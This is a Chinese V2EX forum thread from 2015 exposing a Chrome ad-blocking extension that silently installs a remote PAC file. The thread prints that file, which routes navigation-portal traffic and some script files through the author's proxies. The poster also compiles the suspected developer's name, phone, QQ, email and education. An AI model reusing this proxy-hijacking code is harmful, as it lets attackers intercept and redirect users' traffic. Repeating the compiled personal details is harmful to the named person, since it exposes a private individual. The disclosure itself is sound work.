Chrome 插件/拓展小黄瓜视频广告拦截含有恶意代码

2015-06-14 13:40:31 +08:00
 yeyeye
插件地址
https://chrome.google.com/webstore/detail/%E5%B0%8F%E9%BB%84%E7%93%9C%E8%A7%86%E9%A2%91%E5%B9%BF%E5%91%8A%E6%8B%A6%E6%88%AA/goppkfbpdcohaknmoabhnfclcepcjlda?utm_source=chrome-app-launcher-info-dialog

因为之前使用的去视频去广告插件坑爹了!年久失修,于是去chrome商店看看有没有其他的合适的。
找到《小黄瓜视频广告拦截》,试用了下,可以去广告,但是……

我的代理切换插件不能用了 0 0……代理操作被它独占了,禁用《小黄瓜视频广告拦截》后发现SwitchyOmega颜色不太对(平时绿色,这时变成蓝色了),鼠标放上去显示……现在是一个pac文件在控制代理。



这个pac文件的地址是 http://www.123zouni.com/proxy.pac 好奇宝宝下一步的操作大家都猜到了吧,那就是打开这个网址看看!结果…… 内容如下。

function FindProxyForURL(url, host) {
var regexStr = /.*?:\/\/.*?(youku|qiyi|iqiyi|letv|sohu|ku6|ku6cdn|pps)\.(com|tv)\/crossdomain\.xml/;
if(regexStr.test(url)){
return 'PROXY yk.pp.navi.youku.com:80';
}
if(/^http\:\/\/www\.9991\.com\/\?\w+/.test(url)||/^http\:\/\/www\.9991\.com\/$/.test(url)){
return 'PROXY www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/www\.duba\.com\/\?\w+/.test(url)||/^http\:\/\/www\.duba\.com\/$/.test(url))&&!/http\:\/\/www\.duba\.com\/\?un\_4\_452915/.test(url)){
return 'PROXY www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/123\.sogou\.com\/\?\w+/.test(url)||/^http\:\/\/123\.sogou\.com\/$/.test(url))&&!/http\:\/\/123\.sogou\.com\/\?21705/.test(url)){
return 'PROXY www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/www\.2345\.com\/\?\w+/.test(url)||/^http\:\/\/www\.2345\.com\/$/.test(url))&&!/http\:\/\/www\.2345\.com\/\?29955/.test(url)){
return 'PROXY www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/hao\.360\.cn\/\?\w+/.test(url)||/^http\:\/\/hao\.360\.cn\/$/.test(url))&&!/http\:\/\/hao\.360\.cn\/\?src\=lm\&ls\=n078749b590/.test(url)){
return 'PROXY www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/www\.hao123\.com\/\?\w+/.test(url)||/^http\:\/\/www\.hao123\.com\/$/.test(url))&&!/http\:\/\/www\.hao123\.com\/\?tn\=(96445394|91784390|91783592)\_hao\_pg/.test(url)){
return 'PROXY www.123zouni.com:30005;DIRECT;';
}
var regexStr123=/.*?:\/\/.*?(hao123img)\.com\/res\/js\/track\.js.*/;
if(regexStr123.test(url)){return'PROXY 52.68.93.94:9998'}
var regexStr360=/.*?:\/\/.*?(qhimg)\.com\/lib\/qwrap\/113\.js/;
if(regexStr360.test(url)){return'PROXY 52.68.93.94:9998'}
return 'DIRECT';
}

因为我的js是体育老师教的,但是大概也猜到,就是你访问9991.com2345.com,hao.360.cn,hao123.com 这些网站的时候 这个网址其实是访问的另外一个网址,下面似乎还对一些js文件进行了劫持……

而且为什么要写在pac文件里呢?最简单的原因,就是chrome官方进行审核的时候,是无法审查到这些奇怪的代码的,因为这些代码在自己网站上,随时可改……

而且今天劫持的是这些网址站,还有一些js文件,明天又会劫持什么呢?这就不得而知了……

顺手放狗搜了下 123zouni.com 是谁的 此人也混知乎 知乎的名字是宋超 这里也可以看到他的个人主页是 http://songchao.123zouni.com/ qq号码是 50810004 微博是 http://www.weibo.com/thinkfish1210 电话是 15001373313 博客园是 http://dachie.cnblogs.com/ http://www.cnblogs.com/dachie/ 邮箱: songchao12@foxmail.com 在哪上学
2012.7-2012.8尚德培训机构PMP项目管理培训PMP证书
2005.9-2008.6湖南城市学院园林工程技术专业大专

这些个人信息都是他放在自己个人主页上的 不能算侵犯个人隐私吧?





5564 次点击
所在节点    分享发现
13 条回复
tyhunter
2015-06-14 13:45:12 +08:00
以前遇到植入淘宝客的推广的扩展,直接写信给Google反馈了,第二天该扩展就被下架了
MaiCong
2015-06-14 13:47:55 +08:00
这货会控制浏览器的代理,ss会无法使用,针对这种情况我是直接卸载了它。
yeyeye
2015-06-14 13:58:31 +08:00
@tyhunter 你够狠……

@MaiCong 我也是因此才发现他的不良行为的。
imn1
2015-06-14 14:07:07 +08:00
确实应该按1L做法
f0rger
2015-06-14 14:08:15 +08:00
扩展都不敢乱用了,目前用妈妈2,不过也极少用。
等45秒,就等着吧,要不就买会员吧。
yeyeye
2015-06-14 14:17:35 +08:00
@f0rger 现在已经不是45秒 60秒了 2分多钟的广告都有
n37r06u3
2015-06-14 14:25:01 +08:00
。。。 貌似滴滴打车的工程师
br00k
2015-06-14 14:45:58 +08:00
Mac下干掉优酷和土豆广告不用扩展。。
tyhunter
2015-06-14 14:53:29 +08:00
@yeyeye 这叫狠?缺钱不会在扩展设置页里设置Donate吗,用户觉得真好用自然会捐款感谢作者,需要暗地里通过我每次淘宝的购买行为从而赚钱不是更垃圾吗
RIcter
2015-06-14 15:03:11 +08:00
你的 JavaScript 的确是体育老师教的不假。
return 'PROXY www.123zouni.com:30005;DIRECT;';
这句话的意思不是访问这个网址,而是用 www.123zouni.com:30005 这个代理去访问,或者是直接访问目标网站。

当然,我不可否定的是,通过这个代理去访问,在代理上动手脚与否就无从而知了。
Raidal
2015-06-14 15:16:24 +08:00
楼主可以试试这款ADfree.Player.Offline,一直用着很稳定
EchoChan
2015-06-14 15:55:00 +08:00
同意一楼,也去举报了。
sghsgh
2015-06-14 16:29:49 +08:00
ABP一直用这个

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/198437

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX